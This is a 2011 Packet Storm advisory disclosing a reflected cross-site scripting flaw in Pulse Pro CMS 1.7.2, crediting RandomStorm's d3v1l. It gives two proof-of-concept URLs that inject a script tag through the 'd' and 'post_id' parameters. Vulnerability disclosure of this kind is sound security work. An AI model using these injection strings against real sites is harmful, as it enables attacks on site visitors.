Pulse Pro CMS 1.7.2 Cross Site Scripting

2011-12-13T00:00:00
ID PACKETSTORM:107830
Type packetstorm
Reporter d3v1l
Modified 2011-12-13T00:00:00

Description

                                        
                                            `###############################################################################################################   
  
# Exploit Title: Pulse Pro CMS v.1.7.2 - Reflected Cross-Site Scripting ( XSS ) Vulnerability   
  
# Script Page : http://pulsecms.com  
  
# Date: 13-12-2011  
  
# Author : RandomStorm - http://www.randomstorm.com  
  
# Avram Marius Gabriel (d3v1l)  
  
# Tested on: Windows XP & Vista (FF)   
  
  
###############################################################################################################   
  
# Cross-Site Scripting (XSS) on Front Site  
  
# POC:   
  
# http://site.com/index.php?p=blocks&d="><script>alert(1)</script>   
  
# http://site.com/index.php?p=edit-post&post_id="><script>alert(1)</script>  
  
################################################################################################################   
  
  
# About: Pulse is a simple CMS designed for small websites that enables you to add content management   
to any site in five minutes.  
  
################################################################################################################   
`